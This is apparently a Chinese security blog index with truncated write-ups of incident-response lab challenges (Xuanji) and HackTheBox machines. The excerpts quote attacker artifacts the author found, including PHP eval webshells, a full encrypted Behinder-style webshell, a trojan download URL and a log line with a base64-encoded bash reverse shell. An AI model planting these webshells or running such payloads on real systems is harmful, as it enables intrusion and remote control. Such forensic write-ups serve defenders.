Hi, I'm GAiLO
Security Researcher & Developer — Looking for light.
-
玄机——钓鱼事件应急
桌面上有一个rar文件,下载下来发现有一个pdf文件和一个cmd脚本,猜想是在RAR解压过程中触发此漏洞。查询得知编号为CVE-2023-38831 将cmd病毒样本提取出来后,我们将其甩到云沙箱中查杀一下。可以直接在详情页面查看到一个TCP链接。 但此IP并不是我们的木马下载地址。衍生文件中的pcap流量包中也没有有效数据,我们只能上ida分析。使用tab对main函数反汇编即可查看到下载的恶意木马地址http://192.168.229.156:7001/wls-wsat/7z.exeC:\\Users\\Administrator\\AppData\\Local\\Temp\\7z.exe 使用attrib解除文件隐藏属性,将木马甩到云沙箱内分析,并计算其hash值 找到外连地址为192.168.229.136。在靶机上安装everything扫描得到内网横向的fscan放在C:\Windows\Temp\fscan.exe内。 接下来搜索黑客权限维持所设置的SC任务。使用任务管理器查看服务,查看到一个恶意服务指向木马文件。此即为恶意任务。 影子账户很好找,只需要到Users文件夹下就可以看到一个hack$文件夹。翻看系统日志查找黑客第一次登陆上的时间,查看到此日志 最后我们查看端口的转发规则 得到转发规则
-
玄机——日志分析-mysql应急响应
在网站根目录下找到了黑客写入的shell root@xuanji:/var/www/html# cat sh.php 1 2 <?php @eval($_POST['a']);?> //ccfda79e-7aa1-4275-bc26-a6189eb9a20b 我们需要查看黑客反弹shell的IP。那我们查看一下网站访问日志。 192.168.200.2 - - [01/Aug/2023:02:18:18 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%27)%3B HTTP/1.1" 200 4025 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27ls%20-la%20%2Ftmp%2F%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 其中的base64语句解密后即为黑客反弹shell指令。 我们首先得找到mysql的配置文件,查看网站目录下的common.php发现了数据库账密 root@xuanji:/var/www/html# cat common.php <?php $conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306"); if(!$conn){ echo...
-
玄机——Redis应急响应
首先我们定位redis日志位置,并初步审计一下日志记录的内容。发现有一个IP登陆成功后在调用恶意so文件 419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888 419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started 419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event. 419:S 31 Jul 2023...
-
玄机——Linux入侵排查
首先我们开启靶机。grep一下eval恶意函数,我们可以看到index.php内有后门语句。且sh.php内有第一个flag ./index.php:17:$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>'; ./1.php:1:<?php eval($_POST[1]);?> ./.shell.php:1:<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?> root@xuanji:/var/www/html# cat sh.php 1 2 <?php @eval($_POST['a']);?> 4 //ccfda79e-7aa1-4275-bc26-a6189eb9a20b cmd5网站或hashcat爆一下,得到密码为hello。查看index.php内容,发现其负责生成不死马.shell.php root@ip-10-0-10-1:/var/www/html# cat index.php <?php include('config.php'); include(SYS_ROOT.INC.'common.php'); $path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):''); if(substr($path, 0,1)=='/'){ $path=substr($path,1); } $path = Base::safeword($path); $ctrl=isset($_GET['action'])?$_GET['action']:'run'; if(isset($_GET['createprocess'])) { Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']); }else{ Index::run($path); }...
-
春秋云镜——Delegation
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
HTB——Manager
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
玄机——bulntarget-j-01
上线后首先快速定位网站目录位置phpstudy_pro。审计日志access.log有多份,我们审计修改日期最迟的那份。搜索关键词login可快速定位到登陆的文件名称FNeSOgYGkp.php。而phpstudy搭建的网站服务只有两个端口,随便交一下就可以得到木马文件上传端口为80。 将www文件夹打包到本地,火绒自动报毒显示api3.php为后门文件。注释中标明密码为Admin 查找到后缀前三位为173的日志时发现了对api3.php木马的POST记录。 192.168.112.123 - - [15/Nov/2024:11:01:00 +0800] "POST /api3.php HTTP/1.1" 200 1309 192.168.112.123 - - [15/Nov/2024:11:01:03 +0800] "POST /api3.php HTTP/1.1" 200 3585 192.168.112.123 - - [15/Nov/2024:11:01:07 +0800] "POST /api3.php HTTP/1.1" 200 521 攻击机地址即为上述。
-
HTB——Editorial
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
玄机——vulntarget-b-01
上来我们先定位web服务的根目录位置,通过检索得知是在/www/wwwroot下。然后使用find+grep快速定位恶意文件位置 find /www -name '*.php' | xargs grep 'eval(' /www/wwwroot/jizhi/index.php:eval($_POST["Admin@@"]); 再查看SSH日志,发现除去我们的登录信息,还有两个可疑IP的Accepted信息。其中192.168.83.1就是成功登陆后台的恶意IP [root@ip-10-0-10-3 log]# cat /var/log/secure Dec 11 16:12:48 MiWiFi-RA80-srv sshd[2600]: Accepted password for root from 192.168.31.190 port 62631 ssh2 Nov 20 11:27:57 localhost sshd[2670]: Accepted password for root from 192.168.83.1...
-
HTB——SolarLab
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
玄机——第四章-windows实战-emlog
上线后的第一个flag让我们提交黑客植入的shell。按惯例我们先查杀网站根目录。网站源码整个薅到本地直接报毒在content/plugins/tips文件夹下。内部有shell的密码 <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> 接下来我们查看网站日志,来判断黑客攻击成功的IP。在access.log的日志尾部,我们可以看到大量向shell.php POST的数据。判断此黑客攻击的IP即为192.168.126.1 接下来我们需要查杀黑客的隐藏账户。渗透的权限维持技术发力了,我们直接lusrmgr.msc查看...
-
HTB——Cascade
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...